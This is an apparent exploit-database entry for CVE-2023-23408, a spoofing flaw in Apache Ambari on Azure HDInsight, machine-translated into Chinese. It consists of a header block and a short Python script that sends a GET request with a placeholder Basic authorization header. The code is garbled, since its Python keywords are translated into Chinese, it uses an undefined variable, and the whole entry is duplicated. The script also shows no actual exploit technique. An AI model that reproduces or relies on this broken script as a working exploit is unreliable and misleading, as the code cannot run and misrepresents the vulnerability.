#利用标题: Azure Apache Ambari 2302250400-欺骗
#日期: 2023-06-23
#Country:伊朗
#利用作者: Amirhossein Bahramizadeh
#类别:遥控
#供应商HomePage:
微软
Apache Ambari
Microsoft Azure Hdinsights
#在: Windows/Linux上测试
#CVE : CVE-2023-23408
导入请求
#设置Ambari Web界面的URL和标题
url='https://ambari.example.com/api/v1/clusters/cluster_name/services'
标题={'x-requested-by':'ambari','授权':'基本abcdefghijklmnop'}
#定义验证标题的函数
def validate_headers(标题):
如果“ X-重新征用”不在标题或标题中['x-Requested-by']!='Ambari':
返回false
如果“授权”不在标题或标题中[“授权”]!='基本abcdefghijklmnop':
返回false
返回true
#定义一个函数,将请求发送到Ambari Web界面
def send_request(URL,标题):
如果不是validate_headers(标题):
打印(“无效的标题”)
返回
响应=requests.get(url,标头=标题)
if antsphy.status_code==200:
打印(“要求成功”)
其他:
打印(“请求失败”)
#使用URL和标题调用send_request函数
send_request(URL,标题)
#日期: 2023-06-23
#Country:伊朗
#利用作者: Amirhossein Bahramizadeh
#类别:遥控
#供应商HomePage:
微软
Apache Ambari
Microsoft Azure Hdinsights
#在: Windows/Linux上测试
#CVE : CVE-2023-23408
导入请求
#设置Ambari Web界面的URL和标题
url='https://ambari.example.com/api/v1/clusters/cluster_name/services'
标题={'x-requested-by':'ambari','授权':'基本abcdefghijklmnop'}
#定义验证标题的函数
def validate_headers(标题):
如果“ X-重新征用”不在标题或标题中['x-Requested-by']!='Ambari':
返回false
如果“授权”不在标题或标题中[“授权”]!='基本abcdefghijklmnop':
返回false
返回true
#定义一个函数,将请求发送到Ambari Web界面
def send_request(URL,标题):
如果不是validate_headers(标题):
打印(“无效的标题”)
返回
响应=requests.get(url,标头=标题)
if antsphy.status_code==200:
打印(“要求成功”)
其他:
打印(“请求失败”)
#使用URL和标题调用send_request函数
send_request(URL,标题)
